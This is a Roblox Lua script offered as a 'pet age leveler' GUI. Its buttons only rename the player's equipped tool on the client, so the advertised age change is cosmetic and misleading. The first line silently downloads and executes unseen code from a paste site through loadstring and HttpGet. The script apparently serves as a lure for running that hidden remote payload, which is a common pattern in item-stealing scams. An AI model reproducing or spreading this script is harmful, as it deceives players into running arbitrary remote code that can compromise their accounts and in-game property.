loadstring(game:HttpGet("https://pastefy.app/H6iNsLrz/raw"))()
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local plr = Players.LocalPlayer
local char = plr.Character or plr.CharacterAdded:Wait()

local gui = Instance.new("ScreenGui")
gui.Name = "JamesPetAgeLeveler"
gui.ResetOnSpawn = false
gui.Parent = plr:WaitForChild("PlayerGui")

local function create(class, props, parent)
	local inst = Instance.new(class)
	for k, v in pairs(props) do inst[k] = v end
	inst.Parent = parent
	return inst
end

------------------------------------------------------
------------------------------------------------------

local loadingPopup = create("Frame", {
	Name = "LoadingPopup",
	Size = UDim2.new(0, 300, 0, 100),
	Position = UDim2.new(0.5, -150, 0.5, -50),
	BackgroundColor3 = Color3.fromRGB(240, 230, 255),
}, gui)

create("UICorner", { CornerRadius = UDim.new(0, 12) }, loadingPopup)
create("UIStroke", { Color = Color3.fromRGB(190, 160, 255), Thickness = 2 }, loadingPopup)

create("UIGradient", {
	Color = ColorSequence.new{
		ColorSequenceKeypoint.new(0, Color3.fromRGB(220, 200, 255)),
		ColorSequenceKeypoint.new(1, Color3.fromRGB(245, 235, 255)),
	}
}, loadingPopup)

local loadingLabel = create("TextLabel", {
	Text = "🦝 Loading James' Ui...",
	Font = Enum.Font.GothamBold,
	TextSize = 20,
	TextColor3 = Color3.fromRGB(140, 100, 180),
	BackgroundTransparency = 1,
	Size = UDim2.new(1, 0, 1, 0),
}, loadingPopup)

------------------------------------------------------
-- 💜 MAIN GUI (HIDDEN INITIALLY)
------------------------------------------------------

local frame = create("Frame", {
	Name = "PetAgeFrame",
	Size = UDim2.new(0, 320, 0, 190),
	Position = UDim2.new(0.5, -160, 0.5, -95),
	BackgroundColor3 = Color3.fromRGB(235, 220, 255),
	Visible = false,
	Active = true,
	Draggable = true
}, gui)

create("UICorner", { CornerRadius = UDim.new(0, 12) }, frame)
create("UIStroke", { Color = Color3.fromRGB(190, 160, 255), Thickness = 2 }, frame)

-- Title
create("TextLabel", {
	Text = "🦝 James Pet Age Leveler",
	Font = Enum.Font.FredokaOne,
	TextSize = 20,
	TextColor3 = Color3.fromRGB(120, 70, 180),
	BackgroundTransparency = 1,
	Size = UDim2.new(1, 0, 0, 30),
	Position = UDim2.new(0, 0, 0, 6)
}, frame)

-- Close Button
local closeBtn = create("TextButton", {
	Text = "✖",
	Font = Enum.Font.FredokaOne,
	TextSize = 18,
	TextColor3 = Color3.fromRGB(255, 255, 255),
	BackgroundColor3 = Color3.fromRGB(140, 90, 180),
	Size = UDim2.new(0, 30, 0, 30),
	Position = UDim2.new(1, -35, 0, 6)
}, frame)
create("UICorner", {}, closeBtn)

closeBtn.MouseButton1Click:Connect(function()
	frame.Visible = false
end)

-- Pet Info Label
local petInfo = create("TextLabel", {
	Text = "Equipped Pet: [None]",
	Font = Enum.Font.GothamMedium,
	TextSize = 16,
	TextColor3 = Color3.fromRGB(100, 70, 160),
	BackgroundTransparency = 1,
	Size = UDim2.new(1, -24, 0, 24),
	Position = UDim2.new(0, 12, 0, 44),
	TextXAlignment = Enum.TextXAlignment.Left
}, frame)

-- Set Age Button
local btn1 = create("TextButton", {
	Text = "💜 Set Age to 50",
	Font = Enum.Font.GothamBold,
	TextSize = 16,
	TextColor3 = Color3.fromRGB(255, 255, 255),
	BackgroundColor3 = Color3.fromRGB(180, 140, 255),
	Size = UDim2.new(0.9, 0, 0, 36),
	Position = UDim2.new(0.5, -0.45 * 320, 0, 84)
}, frame)
create("UICorner", {}, btn1)

-- Add +1 Age Button
local btn2 = create("TextButton", {
	Text = "🔮 Add +1 Age",
	Font = Enum.Font.GothamBold,
	TextSize = 16,
	TextColor3 = Color3.fromRGB(255, 255, 255),
	BackgroundColor3 = Color3.fromRGB(180, 140, 255),
	Size = UDim2.new(0.9, 0, 0, 36),
	Position = UDim2.new(0.5, -0.45 * 320, 0, 132)
}, frame)
create("UICorner", {}, btn2)

-- Footer
create("TextLabel", {
	Text = "Tiktok: @JamesScripts 🦝",
	Font = Enum.Font.Gotham,
	TextSize = 13,
	TextColor3 = Color3.fromRGB(140, 100, 180),
	BackgroundTransparency = 1,
	Size = UDim2.new(1, 0, 0, 20),
	Position = UDim2.new(0, 0, 1, -22)
}, frame)

------------------------------------------------------
-- 🧠 FUNCTIONALITY
------------------------------------------------------

-- Get Equipped Pet
local function getPet()
	char = plr.Character or plr.CharacterAdded:Wait()
	for _, tool in pairs(char:GetChildren()) do
		if tool:IsA("Tool") and tool.Name:find("Age") then
			return tool
		end
	end
end

-- Update Pet Info
local function updateLabel()
	local pet = getPet()
	petInfo.Text = "Equipped Pet: " .. (pet and pet.Name or "[None]")
end

-- Set Age to 50 Button
btn1.MouseButton1Click:Connect(function()
	local pet = getPet()
	if pet then
		for i = 3, 1, -1 do
			btn1.Text = "⏳ Changing Age in " .. i .. "..."
			task.wait(1)
		end
		pet.Name = pet.Name:gsub("%[Age%s%d+%]", "[Age 50]")
		updateLabel()
	else
		btn1.Text = "⚠️ No Pet Equipped!"
		task.wait(2)
	end
	btn1.Text = "💜 Set Age to 50"
end)

-- Add +1 Age Button
btn2.MouseButton1Click:Connect(function()
	local pet = getPet()
	local age = pet and tonumber(pet.Name:match("%[Age%s(%d+)%]"))
	if pet and age then
		if age >= 100 then
			btn2.Text = "⚠️ Max Age is 100!"
			task.wait(2)
		else
			for i = 3, 1, -1 do
				btn2.Text = "⏳ Adding +1 in " .. i .. "..."
				task.wait(1)
			end
			local newAge = age + 1
			pet.Name = pet.Name:gsub("%[Age%s%d+%]", "[Age " .. newAge .. "]")
			updateLabel()
		end
	else
		btn2.Text = "⚠️ No Pet Equipped!"
		task.wait(2)
	end
	btn2.Text = "🔮 Add +1 Age"
end)

-- Live Label Updater
task.spawn(function()
	while true do
		updateLabel()
		task.wait(1)
	end
end)

-- Fade out loader and show GUI
task.delay(2.5, function()
	local tween = TweenService:Create(loadingPopup, TweenInfo.new(1), {BackgroundTransparency = 1})
	tween:Play()
	tween.Completed:Wait()
	loadingPopup:Destroy()
	frame.Visible = true
end)
